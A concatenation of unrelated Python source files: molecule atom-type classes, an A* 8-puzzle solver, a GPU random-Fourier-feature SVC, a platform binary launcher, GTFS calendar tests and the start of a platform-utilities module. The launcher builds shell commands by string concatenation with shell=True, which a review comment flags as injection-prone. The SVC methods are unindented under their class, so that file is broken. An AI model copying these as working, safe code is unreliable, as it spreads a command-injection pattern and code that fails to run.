              # it with 'pdb_residue_name' into one bogus entry via implicit
              # string concatenation.
              'pdb_occupancy',
              'pdb_residue_name',
              'pdb_residue_number',
              'pdb_serial_number',
              'pdb_temp_factor']
def _atom_type_factory(atom_attrs, atom_type_name):
    """Create an AtomType subclass named `atom_type_name` whose class
    attributes are taken from the `atom_attrs` mapping.

    Attributes missing from the input stay None; input keys that are
    not declared AtomType attributes are reported and ignored.
    """
    attributes = {attr: None for attr in AtomType.attributes}
    # Report which known attributes the input did not provide.
    # (Bug fix: the original used `assert`/`except AssertionError` for
    # these checks, which silently disappears under `python -O`; plain
    # conditionals are used instead.)
    for attr in AtomType.attributes:
        if attr not in atom_attrs:
            # logging
            print("Attribute {0} not found in atom input.".format(attr))
    # Keep only the input attributes that AtomType actually declares.
    for attr, value in atom_attrs.items():
        if attr in AtomType.attributes:
            attributes[attr] = value
        else:
            # logging
            print("Input attribute {0} not in AtomType attributes, ignoring.".format(attr))
    return type(atom_type_name, (AtomType,), attributes)
# Base AtomType: a bare attribute holder with one slot per atom attribute.
AtomType = type('AtomType', (object,), {attr: None for attr in atom_attrs})
AtomType.attributes = atom_attrs
AtomType.factory = _atom_type_factory

# Element-specific atom types.
# Bug fix: `atomic_num` previously held mass numbers (O: 16, C: 12);
# the correct atomic numbers are O: 8 and C: 6 (H: 1 was already right).
O_attrs = {'atomic_num': 8, 'element': 'O'}
O_ATOM_TYPE = AtomType.factory(O_attrs, 'OAtomType')
H_attrs = {'atomic_num': 1, 'element': 'H'}
H_ATOM_TYPE = AtomType.factory(H_attrs, 'HAtomType')
C_attrs = {'atomic_num': 6, 'element': 'C'}
C_ATOM_TYPE = AtomType.factory(C_attrs, 'CAtomType')
class MoleculeType(object):
    """Template describing a molecule: an ordered sequence of atom types
    plus lazily-populated feature/bond metadata."""

    def __init__(self, name=None, atom_types=None, ):
        # Tolerate the documented default atom_types=None instead of
        # crashing on set(None) (bug fix).
        self._atom_type_library = set(atom_types) if atom_types is not None else set()
        self._features = None
        self._feature_families = None
        self._feature_types = None
        self._bonds = None
        self.name = name
        self._atom_type_sequence = atom_types

    @property
    def atom_type_library(self):
        """Distinct atom types used by this molecule, as a list."""
        return list(self._atom_type_library)

    @property
    def features(self):
        return self._features

    @property
    def feature_families(self):
        return self._feature_families

    @property
    def feature_types(self):
        return self._feature_types

    @property
    def atom_types(self):
        """Ordered sequence of atom types, as given at construction."""
        return self._atom_type_sequence

    @property
    def bonds(self):
        return self._bonds

    def to_molecule(self, coords=None):
        """Construct a Molecule using input coordinates with mapped indices.

        Bug fix: this was decorated with @property even though it takes a
        `coords` argument, so callers could never pass coordinates; it is
        now a regular method.

        NOTE(review): relies on `self.molecule` and
        `self.make_atom_type_library()`, which are not defined in this
        class — confirm they are provided by subclasses.
        """
        coord_array = CoordArray(coords)
        # Make atoms out of the coord array
        self.make_atom_type_library()
        atom_idxs = range(self.molecule.GetNumAtoms())
        atoms = []
        for atom_idx in atom_idxs:
            atom_type = self.atom_type_library[atom_idx]
            atom = Atom(atom_array=coord_array, array_idx=atom_idx, atom_type=atom_type)
            atoms.append(atom)
        # handle bonds
        bonds = []
        for bond in self.molecule.GetBonds():
            bonds.append(Bond(atoms, (bond.GetBeginAtomIdx(), bond.GetEndAtomIdx())))
        # TODO handle and create angles
        angles = None
        return Molecule(atoms, bonds, angles, mol_type=self)

    @classmethod
    def factory(cls, mol_type_name, name=None, atom_types=None):
        """Create a new MoleculeType subclass named `mol_type_name` and
        return an instance of it."""
        mol_class = type(mol_type_name, (cls,), {})
        mol_type = mol_class(name=name, atom_types=atom_types)
        return mol_type
# Concrete molecule types built from the element atom types above.
water_attrs = {'atom_types' : [H_ATOM_TYPE, O_ATOM_TYPE, H_ATOM_TYPE],
               'name' : 'water'}
methanol_attrs = {'atom_types' : [H_ATOM_TYPE, O_ATOM_TYPE, C_ATOM_TYPE,
                                  H_ATOM_TYPE, H_ATOM_TYPE, H_ATOM_TYPE],
                  'name' : 'methanol'}
WATER_TYPE = MoleculeType.factory('WaterType', **water_attrs)
METHANOL_TYPE = MoleculeType.factory('MethanolType', **methanol_attrs)
|
<gh_stars>1-10
import sys
from heapq import heappush, heappop
import time
class GameBoard:
    """A single 3x3 sliding-puzzle state; gameState is a 3x3 list of ints,
    with 0 denoting the blank square."""

    def __init__(self, gameState):
        self.gameState = gameState

    def findCord(self, value):
        """Coordinate (row, col) of `value` in the goal layout."""
        target = [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
        for row in range(3):
            for col in range(3):
                if target[row][col] == value:
                    return row, col

    def calManthattan_dis(self):
        """Sum of Manhattan distances of all non-blank tiles to their
        goal squares."""
        total = 0
        for row in range(3):
            for col in range(3):
                tile = self.gameState[row][col]
                if tile != 0:
                    total += self.calSingleTile(tile, row, col)
        return total

    def calSingleTile(self, v, x, y):
        """Manhattan distance of tile `v` at (x, y) from its goal square."""
        goalX, goalY = self.findCord(v)
        return abs(x - goalX) + abs(y - goalY)

    def findZeroLoc(self):
        """Coordinate (row, col) of the blank tile."""
        for row in range(3):
            for col in range(3):
                if self.gameState[row][col] == 0:
                    return row, col

    def findValidNe(self):
        """Coordinates of the squares that can slide into the blank,
        in the order down, right, up, left."""
        zeroX, zeroY = self.findZeroLoc()
        offsets = [(1, 0), (0, 1), (-1, 0), (0, -1)]
        return [(zeroX + dx, zeroY + dy)
                for dx, dy in offsets
                if self.checkLocValid(zeroX + dx, zeroY + dy)]

    def checkLocValid(self, x, y):
        """True when (x, y) lies on the 3x3 board."""
        return 0 <= x <= 2 and 0 <= y <= 2

    def cloneBoard(self):
        """Row-by-row copy of the board."""
        return [list(row) for row in self.gameState]

    def makeMove(self, x, y):
        """Board obtained by swapping the blank with the tile at (x, y)."""
        moved = self.cloneBoard()
        zeroX, zeroY = self.findZeroLoc()
        moved[zeroX][zeroY] = moved[x][y]
        moved[x][y] = 0
        return moved

    def everyPossibleMove(self):
        """All board states reachable in a single move."""
        return [self.makeMove(x, y) for x, y in self.findValidNe()]

    def findOutput(self):
        """Letter label (A..I) of the blank's current square."""
        labels = [['A', 'B', 'C'], ['D', 'E', 'F'], ['G', 'H', 'I']]
        row, col = self.findZeroLoc()
        return labels[row][col]
# Search-tree node for the A* algorithm.
class Node:
    """Wraps a puzzle state together with path-cost bookkeeping."""

    def __init__(self, puzzle, parent=None):
        self.puzzle = puzzle
        self.parent = parent
        # g-value: one more than the parent's, or 0 at the root.
        self.costSoFar = 0 if parent is None else parent.costSoFar + 1

    def heuristic(self):
        """h-value: total Manhattan distance of the board."""
        return self.puzzle.calManthattan_dis()

    def score(self):
        """f-value: g + h."""
        return self.costSoFar + self.heuristic()

    def __lt__(self, otherNode):
        # Heap ordering is by f-value.
        return self.score() < otherNode.score()

    def checkEnd(self):
        """True when the wrapped board equals the goal state."""
        goalState = [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
        return str(self.puzzle.gameState) == str(goalState)
def Astar(initState):
    """A* search starting from the Node `initState`; returns the goal
    node, or None when the open list is exhausted without a solution."""
    openList = []
    closedList = []
    heappush(openList, initState)
    while openList:
        # Expand the queued node with the smallest f-value.
        current = heappop(openList)
        closedList.append(current)
        if current.checkEnd():
            return current
        for move in current.puzzle.everyPossibleMove():
            neighbour = Node(GameBoard(move), current)
            # Skip states that were already expanded.
            if any(seen.puzzle.gameState == move for seen in closedList):
                continue
            # Skip states already queued with an equal-or-better g-value.
            if any(move == queued.puzzle.gameState and neighbour.costSoFar > queued.costSoFar
                   for queued in openList):
                continue
            heappush(openList, neighbour)
# ---------------------------------------------------------------------------
# Command-line driver: argv[1] holds the nine puzzle digits in row order
# (e.g. "103425678"); prints the sequence of blank positions as letters.
# ---------------------------------------------------------------------------
# Renamed from `input`, which shadowed the builtin of the same name.
puzzle_input = sys.argv[1]
# obtain the input digits as a 3x3 list of ints
initList = [[int(ch) for ch in puzzle_input[row * 3:(row + 1) * 3]]
            for row in range(3)]
# init the board and the root search node
initBoard = GameBoard(initList)
initNode = Node(initBoard)
# run astar
# NOTE(review): Astar returns None for unsolvable inputs, which would
# crash the walk below — same behavior as the original script.
end = Astar(initNode)
# obtain the move sequence by walking parent links back to the root
iterNode = end
sequence = []
while iterNode.parent is not None:
    # prepend so the path reads root-to-goal
    sequence.insert(0, iterNode.puzzle.findOutput())
    iterNode = iterNode.parent
reverseStr = "".join(sequence)
print(reverseStr)
|
#!/usr/bin/env python3
#
# Python module of support vector classification with random matrix for CPU.
######################################### SOURCE START ########################################
import numpy as np
import torch
from .rfflearn_gpu_common import Base
### This class provides the RFF based SVC classification using GPU.
### NOTE: Number of data (= X_cpu.shape[0]) must be a multiple of batch size.
class SVC(Base):
### Create parameters on CPU, then move the parameters to GPU.
### There are two ways to initialize these parameters:
### (1) from scratch: generate parameters from scratch,
### (2) from rffsvc: copy parameters from RFFSVC (CPU) class instance.
### The member variable 'self.initialized' indicate that the parameters are well initialized
### or not. If the parameters are initialized by one of the ways other than (1),
### 'self.initialized' is set to True. And if 'self.initialized' is still False when just
### before the training/inference, then the parameters are initialized by the way (1).
def __init__(self, rand_mat_type, svc = None, M_pre = None, dim_kernel = 128, std_kernel = 0.1,
             W = None, batch_size = 200, dtype = 'float64', *pargs, **kwargs):
    ### Save important variables.
    ###   - dim_kernel: number of RFF dimensions (features are 2*dim_kernel wide).
    ###   - std_kernel: standard deviation used for the random matrix.
    ###   - W: optional pre-generated random matrix.
    self.dim_kernel = dim_kernel
    self.std = std_kernel
    self.batch_size = batch_size
    self.dtype = dtype
    self.initialized = False
    self.W = W
    ### Automatically detect device.
    ### This module assumes that GPU is available, but works if not available.
    self.device = "cuda" if torch.cuda.is_available() else "cpu"
    ### Initialize variables: copy from a trained CPU SVC when one is
    ### given, otherwise defer to the base class (scratch initialization
    ### happens lazily just before training/inference).
    if svc: self.init_from_RFFSVC_cpu(svc, M_pre)
    else: super().__init__(rand_mat_type, dim_kernel, std_kernel, W)
### Constructor helper: initialize parameters from scratch.
### NOTE(review): the `std` parameter is unused here — set_weight
### presumably reads self.std; confirm.
def init_from_scratch(self, dim_input, dim_kernel, dim_output, std):
    ### Generate random matrix.
    self.set_weight(dim_input)
    ### Create parameters on CPU.
    ###   - W: Random matrix of Random Fourier Features. (shape = [dim_input, dim_kernel]).
    ###   - A: Coefficients of Linear SVC. (shape = [2 * dim_kernel, dim_output],
    ###        because cos and sin features are concatenated).
    ###   - b: Intercepts of Linear SVC. (shape = [1, dim_output]).
    self.W_cpu = self.W
    self.A_cpu = 0.01 * np.random.randn(2 * dim_kernel, dim_output)
    self.b_cpu = 0.01 * np.random.randn(1, dim_output)
    ### Create GPU variables and build GPU model.
    self.build()
    ### Mark as initialized.
    self.initialized = True
### Copy parameters from the given rffsvc and create instance.
def init_from_RFFSVC_cpu(self, svc_cpu, M_pre):
    ### Only RFFSVC supports GPU inference; reject anything without the
    ### expected random matrix and fitted linear-SVM attributes.
    if not hasattr(svc_cpu, "W") or not hasattr(svc_cpu, "svm") or not hasattr(svc_cpu.svm, "coef_") or not hasattr(svc_cpu.svm, "intercept_"):
        raise TypeError("rfflearn.gpu.SVC: Only rfflearn.cpu.SVC supported.")
    ### TODO: One-versus-one classifier is not supported now.
    if svc_cpu.svm.get_params()["estimator__multi_class"] != "ovr":
        raise TypeError("rfflearn.gpu.SVC: Sorry, current implementation support only One-versus-the-rest classifier.")
    ### Copy parameters from rffsvc on CPU.
    ###   - W: Random matrix of Random Fourier Features.
    ###        If PCA applied, combine it to the random matrix for high throughput.
    ###   - A: Coefficients of Linear SVC.
    ###   - b: Intercepts of Linear SVC.
    self.W_cpu = M_pre.dot(svc_cpu.W) if M_pre is not None else svc_cpu.W
    self.A_cpu = svc_cpu.svm.coef_.T
    self.b_cpu = svc_cpu.svm.intercept_.T
    ### Create GPU variables and build GPU model.
    self.build()
    ### Mark as initialized.
    self.initialized = True
### Create GPU variables if all CPU variables are ready.
def build(self):
    ### Run the build procedure if and only if all CPU-side variables
    ### are available; otherwise this is a silent no-op.
    if all(v is not None for v in [self.W_cpu, self.A_cpu, self.b_cpu]):
        ### Create GPU variables.  Only A and b are trained; the random
        ### matrix W stays fixed (requires_grad = False).
        self.W_gpu = torch.tensor(self.W_cpu, dtype = torch.float64, device = self.device, requires_grad = False)
        self.A_gpu = torch.tensor(self.A_cpu, dtype = torch.float64, device = self.device, requires_grad = True)
        self.b_gpu = torch.tensor(self.b_cpu, dtype = torch.float64, device = self.device, requires_grad = True)
        self.params = [self.A_gpu, self.b_gpu]
### Train the model for one batch.
###   - X_gpu, y_gpu (torch.Tensor): one batch of inputs and +1/-1 labels,
###     already moved to the target device.
###   - opt: torch optimizer updating self.A_gpu / self.b_gpu.
### Returns the scalar hinge-loss value for the batch.
def fit_batch(self, X_gpu, y_gpu, opt):
    ### Bug fix: zero stale gradients before the backward pass — without
    ### this, gradients of successive batches accumulate on A and b.
    opt.zero_grad()
    ### Random Fourier features of the batch, then the linear SVC score.
    ### (The old comment mentioned TensorFlow's GradientTape; this is
    ### plain PyTorch autograd.)
    z = torch.matmul(X_gpu, self.W_gpu)
    z = torch.cat([torch.cos(z), torch.sin(z)], 1)
    p = torch.matmul(z, self.A_gpu) + self.b_gpu
    ### Multi-class hinge loss, averaged over the batch.
    v = torch.mean(torch.sum(torch.max(torch.zeros_like(y_gpu), 1 - y_gpu * p), dim = 1))
    ### Derive gradients for all trainable variables and take one step.
    v.backward()
    with torch.no_grad():
        opt.step()
    return float(v.cpu())
def fit(self, X_cpu, y_cpu, epoch_max = 300, opt = "sgd", learning_rate = 1.0E-2, weight_decay = 10.0, quiet = False):
    """Train the SVM parameters with mini-batch hinge loss.

    Args:
        X_cpu (np.array, shape = [N, K]): Training data.
        y_cpu (np.array, shape = [N,]):   Integer class labels in [0, C).
        epoch_max (int):       Number of training epochs.
        opt (str):             One of "sgd", "rmsprop", "adam", "adamw".
        learning_rate (float): Optimizer learning rate.
        weight_decay (float):  L2 regularization (used by sgd and adamw).
        quiet (bool):          Suppress the progress printout when True.

    Returns:
        self, so calls can be chained.

    Raises:
        ValueError: if `opt` is not a recognized optimizer name.
    """
    ### Get hyper parameters.
    dim_input = X_cpu.shape[1]
    dim_output = np.max(y_cpu) + 1
    ### Convert the label to +1/-1 format (one-hot mapped to {-1, +1}).
    X_cpu = X_cpu.astype(self.dtype)
    y_cpu = (2 * np.identity(dim_output)[y_cpu] - 1).astype(self.dtype)
    ### Create random matrix of RFF and linear SVM parameters on GPU.
    if not self.initialized:
        self.init_from_scratch(dim_input, self.dim_kernel, dim_output, self.std)
    ### Get optimizer.
    if opt == "sgd" : opt = torch.optim.SGD(self.params, learning_rate, weight_decay = weight_decay)
    elif opt == "rmsprop": opt = torch.optim.RMSprop(self.params, learning_rate)
    elif opt == "adam" : opt = torch.optim.Adam(self.params, learning_rate)
    elif opt == "adamw" : opt = torch.optim.AdamW(self.params, learning_rate, weight_decay = weight_decay, amsgrad = True)
    ### BUG FIX: an unknown optimizer name used to fall through silently,
    ### leaving `opt` a string and crashing later inside fit_batch.
    else: raise ValueError("rfflearn.gpu.SVC: unknown optimizer '%s'" % opt)
    ### Create dataset instance for training.
    train_dataset = torch.utils.data.TensorDataset(torch.tensor(X_cpu), torch.tensor(y_cpu))
    train_loader = torch.utils.data.DataLoader(train_dataset, batch_size = self.batch_size, shuffle = True)
    ### Variable to store loss values in one epoch.
    losses = []
    for epoch in range(epoch_max):
        ### Train one epoch.
        for step, (Xs_batch, ys_batch) in enumerate(train_loader):
            loss = self.fit_batch(Xs_batch.to(self.device), ys_batch.to(self.device), opt)
            losses.append(loss)
        ### Print training log every 10 epochs.
        if not quiet and epoch % 10 == 0:
            print(f"Epoch {epoch:>4}: Train loss = {np.mean(losses):.4e}")
        ### Clear loss values for the next epoch.
        losses.clear()
    return self
### Run the PyTorch RFF model for a single batch.
### - X_cpu (np.array, shape = [N, K]): input data,
###   where N is the number of samples and K the input dimension.
def predict_proba_batch(self, X_cpu):
    X_gpu = torch.tensor(X_cpu, device = self.device)
    feat = torch.matmul(X_gpu, self.W_gpu)
    feat = torch.cat([torch.cos(feat), torch.sin(feat)], 1)
    scores = torch.matmul(feat, self.A_gpu) + self.b_gpu
    return scores.detach().cpu().numpy()
### Run prediction and return the decision-function values (features).
### - X_cpu (np.array, shape = [N, K]): input data; N must be a multiple
###   of self.batch_size (each batch is pushed through the GPU model).
def predict_proba(self, X_cpu):
    bs = self.batch_size
    num_batches, remainder = divmod(X_cpu.shape[0], bs)
    if remainder != 0:
        raise ValueError("rfflearn.gpu.SVC: Number of input data must be a multiple of batch size")
    ### Predict batch by batch, then stitch the results back together.
    chunks = []
    for n in range(num_batches):
        batch = X_cpu[bs*n:bs*(n+1), :].astype(self.dtype)
        chunks.append(self.predict_proba_batch(batch))
    return np.concatenate(chunks)
### Run prediction and return log of the probability-like scores.
### - X_cpu (np.array, shape = [N, K]): input data.
def predict_log_proba(self, X_cpu, **args):
    scores = self.predict_proba(X_cpu)
    return np.log(scores)
### Run prediction and return the most likely class label per sample.
### - X_cpu (np.array, shape = [N, K]): input data.
def predict(self, X_cpu, **args):
    scores = self.predict_proba(X_cpu)
    return np.argmax(scores, axis = 1)
### Return the classification accuracy on (X_cpu, y_cpu).
### - X_cpu (np.array, shape = [N, K]): input data,
### - y_cpu (np.array, shape = [N,]):   true class labels.
def score(self, X_cpu, y_cpu, **args):
    predictions = self.predict(X_cpu)
    return np.mean(y_cpu == predictions)
### The above functions/classes are not visible from users of this library,
### because of the complicated usage. The following classes are simplified
### version of the classes. These classes are visible from users.
### Support vector classifier with random Fourier features (RFF).
### NOTE(review): the original comment said "Gaussian process regression",
### which does not match this SVC subclass -- corrected in comments only.
class RFFSVC(SVC):
    """GPU support vector classifier using random Fourier features ("rff")."""
    def __init__(self, *pargs, **kwargs):
        super().__init__("rff", *pargs, **kwargs)
### Support vector classifier with orthogonal random features (ORF).
### NOTE(review): original comment said "Gaussian process regression" -- slip.
class ORFSVC(SVC):
    """GPU support vector classifier using orthogonal random features ("orf")."""
    def __init__(self, *pargs, **kwargs):
        super().__init__("orf", *pargs, **kwargs)
### Support vector classifier with quasi-random Fourier features (QRF).
### NOTE(review): original comment said "Gaussian process regression" -- slip.
class QRFSVC(SVC):
    """GPU support vector classifier using quasi-random Fourier features ("qrf")."""
    def __init__(self, *pargs, **kwargs):
        super().__init__("qrf", *pargs, **kwargs)
######################################### SOURCE FINISH #######################################
# Author: <NAME> <<EMAIL>>
# vim: expandtab tabstop=4 shiftwidth=4 fdm=marker
|
#!/usr/bin/python
## Python Launcher
import platform
import sys
from subprocess import call
import subprocess
import logging
class Config(object):
    """Holds the OS / CPU-architecture combinations a binary supports.

    Arch values follow the Node.js convention ('arm', 'ia32', 'x64'); OS
    values follow process.platform ('darwin', 'freebsd', 'linux', 'sunos',
    'win32') -- see https://nodejs.org/dist/latest-v5.x/docs/api/process.html
    """

    def __init__(self, requiredOSs, requiredArchs):
        # Lists of acceptable host OS names and architectures.
        self.requiredOSs = requiredOSs
        self.requiredArchs = requiredArchs
class launcher(object):
    """Launches a platform-appropriate binary for the current host.

    The binary path is suffixed with ``.exe`` on Windows and executed
    through the shell; launching returns the ``subprocess.Popen`` handle.
    """

    def __init__(self):
        logging.basicConfig(filename='worldpay-within-wrapper.log', level=logging.DEBUG)
        logging.info("Initialising launcher")

    def launch(self, cfg, path, flags):
        """Validate *cfg* against the host OS/arch and start the binary.

        Returns the started process, or None when validation fails or the
        host OS is unsupported.
        """
        logging.debug("Determine the OS and Architecture this application is currently running on")
        hostOS = self.detectHostOS()
        logging.debug("hostOS: " + str(hostOS))
        hostArchitecture = self.detectHostArchitecture()
        logging.debug("hostArchitecture: " + str(hostArchitecture))
        if not self.validateConfig(cfg, hostOS, hostArchitecture):
            logging.debug("Invalid OS/Architecture combination detected")
            return None
        if hostOS == "darwin":
            return self.launchDarwin(path, flags)
        if hostOS == "linux":
            return self.launchLinux(path, flags)
        # platform.system() yields "windows"; "win32" kept for compatibility.
        if hostOS in ("win32", "windows"):
            return self.launchWindows(path, flags)
        logging.debug("Unable to launch binary on host architecture (Unsupported by launcher)(Host=" + str(hostOS) + ")")
        return None

    def detectHostOS(self):
        """Return the lower-cased host OS name (e.g. 'linux', 'darwin')."""
        # BUG FIX: original returned `process.platform` (a Node.js-ism that is
        # undefined in Python and raised NameError).
        return platform.system().lower()

    def detectHostArchitecture(self):
        """Return 'x64' on 64-bit Python builds, otherwise 'ia32'."""
        # BUG FIX: original returned `process.arch` (undefined -> NameError).
        return 'x64' if sys.maxsize > 2 ** 32 else 'ia32'

    def _launchShell(self, cmd):
        # NOTE(review): shell=True with a concatenated command string is
        # shell-injection prone if path/flags are untrusted -- kept for
        # backwards compatibility with existing callers.
        return subprocess.Popen(cmd, shell=True)

    def launchDarwin(self, path, flags):
        """Launch the binary on macOS; returns the Popen handle."""
        logging.info("launching Darwin application")
        cmd = path if flags is None else path + " " + flags
        return self._launchShell(cmd)

    def launchLinux(self, path, flags):
        """Launch the binary on Linux; returns the Popen handle."""
        logging.info("launching Linux application")
        cmd = path if flags is None else path + " " + flags
        return self._launchShell(cmd)

    def launchWindows(self, path, flags):
        """Launch the '.exe' binary on Windows; returns the Popen handle."""
        logging.info("launching Windows application")
        cmd = path + ".exe" if flags is None else path + ".exe " + flags
        return self._launchShell(cmd)

    def validateConfig(self, cfg, hostOS, hostArchitecture):
        """Return True when both host OS and architecture are allowed by cfg."""
        logging.debug("Validate detected parameters against config")
        validOS = False
        validArch = False
        for requiredOS in cfg.requiredOSs:
            logging.debug(str(requiredOS))
            if requiredOS.lower() == hostOS:
                validOS = True
        for requiredArch in cfg.requiredArchs:
            logging.debug(str(requiredArch))
            if requiredArch.lower() == hostArchitecture:
                validArch = True
        return validOS and validArch
|
<gh_stars>1-10
from transx2gtfs.data import get_path
import pytest
@pytest.fixture
def test_tfl_data():
    """Return the path to the bundled TfL-format TransXChange test file."""
    return get_path('test_tfl_format')
@pytest.fixture
def test_txc21_data():
    """Return the path to the bundled TransXChange 2.1 format test file."""
    return get_path('test_txc21_format')
@pytest.fixture
def test_naptan_data():
    """Return the path to the bundled NaPTAN stops test data."""
    return get_path('naptan_stops')
def test_calendar_weekday_info_tfl(test_tfl_data):
    """Operative-days string of the TfL test feed must be exactly 'Weekend'."""
    from transx2gtfs.calendar import get_service_operative_days_info
    import untangle

    parsed_feed = untangle.parse(test_tfl_data)
    operative_days = get_service_operative_days_info(parsed_feed)
    # The parser returns a plain-text description of the operative days.
    assert isinstance(operative_days, str)
    assert operative_days == 'Weekend'
def test_calendar_weekday_info_txc21(test_txc21_data):
    """Operative-days string of the TXC 2.1 test feed must be exactly 'Weekend'."""
    from transx2gtfs.calendar import get_service_operative_days_info
    import untangle

    parsed_feed = untangle.parse(test_txc21_data)
    operative_days = get_service_operative_days_info(parsed_feed)
    # The parser returns a plain-text description of the operative days.
    assert isinstance(operative_days, str)
    assert operative_days == 'Weekend'
def test_calendar_dataframe_tfl(test_tfl_data):
    """Each TfL VehicleJourney parses to the expected one-row weekday frame."""
    from transx2gtfs.calendar import get_weekday_info, parse_day_range
    from pandas import DataFrame
    from pandas.testing import assert_frame_equal
    import untangle
    data = untangle.parse(test_tfl_data)
    # Get vehicle journeys
    vjourneys = data.TransXChange.VehicleJourneys.VehicleJourney
    # Expected one-row frames keyed by the parsed day name.
    correct_frames = {'Sunday': DataFrame({'friday': 0.0, 'monday': 0.0, 'saturday': 0.0,
                                           'sunday': 1.0, 'thursday': 0.0,
                                           'tuesday': 0.0, 'wednesday': 0.0}, index=[0]),
                      'Saturday': DataFrame({'friday': 0.0, 'monday': 0.0, 'saturday': 1.0,
                                             'sunday': 0.0, 'thursday': 0.0,
                                             'tuesday': 0.0, 'wednesday': 0.0}, index=[0])
                      }
    for i, journey in enumerate(vjourneys):
        # Parse weekday operation times from VehicleJourney
        weekdays = get_weekday_info(journey)
        # Should return text
        assert isinstance(weekdays, str)
        # The fixture only contains weekend journeys.
        assert weekdays in ['Sunday', 'Saturday']
        # Get a row of DataFrame and compare with the expected frame.
        calendar_info = parse_day_range(weekdays)
        assert_frame_equal(calendar_info, correct_frames[weekdays])
def test_calendar_dataframe_txc21(test_txc21_data):
    """Each TXC 2.1 VehicleJourney parses to the expected one-row weekday frame."""
    from transx2gtfs.calendar import get_weekday_info, parse_day_range
    from pandas import DataFrame
    from pandas.testing import assert_frame_equal
    import untangle
    data = untangle.parse(test_txc21_data)
    # Get vehicle journeys
    vjourneys = data.TransXChange.VehicleJourneys.VehicleJourney
    # Expected one-row frames keyed by the parsed day name.
    correct_frames = {'Sunday': DataFrame({'friday': 0.0, 'monday': 0.0, 'saturday': 0.0,
                                           'sunday': 1.0, 'thursday': 0.0,
                                           'tuesday': 0.0, 'wednesday': 0.0}, index=[0]),
                      'Saturday': DataFrame({'friday': 0.0, 'monday': 0.0, 'saturday': 1.0,
                                             'sunday': 0.0, 'thursday': 0.0,
                                             'tuesday': 0.0, 'wednesday': 0.0}, index=[0])
                      }
    for i, journey in enumerate(vjourneys):
        # Parse weekday operation times from VehicleJourney
        weekdays = get_weekday_info(journey)
        # Should return text
        assert isinstance(weekdays, str)
        # The fixture only contains weekend journeys.
        assert weekdays in ['Sunday', 'Saturday']
        # Get a row of DataFrame and compare with the expected frame.
        calendar_info = parse_day_range(weekdays)
        assert_frame_equal(calendar_info, correct_frames[weekdays])
def test_get_calendar_tfl(test_tfl_data):
    """get_calendar builds the expected weekend-only GTFS calendar (TfL feed)."""
    from transx2gtfs.calendar import get_calendar
    from transx2gtfs.transxchange import get_gtfs_info
    from pandas import DataFrame
    from pandas.testing import assert_frame_equal
    import numpy as np
    import untangle
    data = untangle.parse(test_tfl_data)
    # Get gtfs info
    gtfs_info = get_gtfs_info(data)
    assert isinstance(gtfs_info, DataFrame)
    # Get GTFS calendar
    gtfs_calendar = get_calendar(gtfs_info)
    assert isinstance(gtfs_calendar, DataFrame)
    # Expected rows: one Sunday-only and one Saturday-only service.
    correct_frame = DataFrame({
        'service_id': ["1-HAM-_-y05-2675925_20190713_20190714_Sunday",
                       "1-HAM-_-y05-2675925_20190713_20190714_Saturday"],
        'monday': np.int64([0, 0]), 'tuesday': np.int64([0, 0]), 'wednesday': np.int64([0, 0]),
        'thursday': np.int64([0, 0]), 'friday': np.int64([0, 0]),
        'saturday': np.int64([0, 1]), 'sunday': np.int64([1, 0]),
        'start_date': ["20190713", "20190713"],
        'end_date': ["20190714", "20190714"],
    }, index=[0, 1])
    try:
        # Check that the frames match
        assert_frame_equal(gtfs_calendar, correct_frame)
    except AssertionError as e:
        # Ignore the dtype int32/int64 difference (platform-dependent default).
        if """Attribute "dtype" are different""" in str(e):
            pass
        else:
            raise e
def test_get_calendar_txc21(test_txc21_data):
    """get_calendar builds the expected weekend-only GTFS calendar (TXC 2.1 feed)."""
    from transx2gtfs.calendar import get_calendar
    from transx2gtfs.transxchange import get_gtfs_info
    from pandas import DataFrame
    from pandas.testing import assert_frame_equal
    import numpy as np
    import untangle
    data = untangle.parse(test_txc21_data)
    # Get gtfs info
    gtfs_info = get_gtfs_info(data)
    assert isinstance(gtfs_info, DataFrame)
    # Get GTFS calendar
    gtfs_calendar = get_calendar(gtfs_info)
    assert isinstance(gtfs_calendar, DataFrame)
    # Expected rows: one Sunday-only and one Saturday-only service.
    correct_frame = DataFrame({
        'service_id': ["99-PIC-B-y05-4_20200201_20200202_Sunday",
                       "99-PIC-B-y05-4_20200201_20200202_Saturday"],
        'monday': np.int64([0, 0]), 'tuesday': np.int64([0, 0]), 'wednesday': np.int64([0, 0]),
        'thursday': np.int64([0, 0]), 'friday': np.int64([0, 0]),
        'saturday': np.int64([0, 1]), 'sunday': np.int64([1, 0]),
        'start_date': ["20200201", "20200201"],
        'end_date': ["20200202", "20200202"],
    }, index=[0, 1])
    try:
        # Check that the frames match
        assert_frame_equal(gtfs_calendar, correct_frame)
    except AssertionError as e:
        # Ignore the dtype int32/int64 difference (platform-dependent default).
        if """Attribute "dtype" are different""" in str(e):
            pass
        else:
            raise e
|
<gh_stars>0
"""Platforms.
Utilities dealing with platform specifics: signals, daemonization,
users, groups, and so on.
"""
import atexit
import errno
import math
import numbers
import os
import platform as _platform
import signal as _signal
import sys
import warnings
from collections import namedtuple
from contextlib import contextmanager
from billiard.compat import close_open_fds, get_fdmax
# fileno used to be in this module
from kombu.utils.compat import maybe_fileno
from kombu.utils.encoding import safe_str
from .exceptions import SecurityError, SecurityWarning, reraise
from .local import try_import
try:
from billiard.process import current_process
except ImportError: # pragma: no cover
current_process = None
_setproctitle = try_import('setproctitle')
resource = try_import('resource')
pwd = try_import('pwd')
grp = try_import('grp')
mputil = try_import('multiprocessing.util')
__all__ = (
'EX_OK', 'EX_FAILURE', 'EX_UNAVAILABLE', 'EX_USAGE', 'SYSTEM',
'IS_macOS', 'IS_WINDOWS', 'SIGMAP', 'pyimplementation', 'LockFailed',
'get_fdmax', 'Pidfile', 'create_pidlock', 'close_open_fds',
'DaemonContext', 'detached', 'parse_uid', 'parse_gid', 'setgroups',
'initgroups', 'setgid', 'setuid', 'maybe_drop_privileges', 'signals',
'signal_name', 'set_process_title', 'set_mp_process_title',
'get_errno_name', 'ignore_errno', 'fd_by_path', 'isatty',
)
# exitcodes (fall back to the conventional values where os.EX_* is missing)
EX_OK = getattr(os, 'EX_OK', 0)
EX_FAILURE = 1
EX_UNAVAILABLE = getattr(os, 'EX_UNAVAILABLE', 69)
EX_USAGE = getattr(os, 'EX_USAGE', 64)
EX_CANTCREAT = getattr(os, 'EX_CANTCREAT', 73)

# Host platform identification.
SYSTEM = _platform.system()
IS_macOS = SYSTEM == 'Darwin'
IS_WINDOWS = SYSTEM == 'Windows'

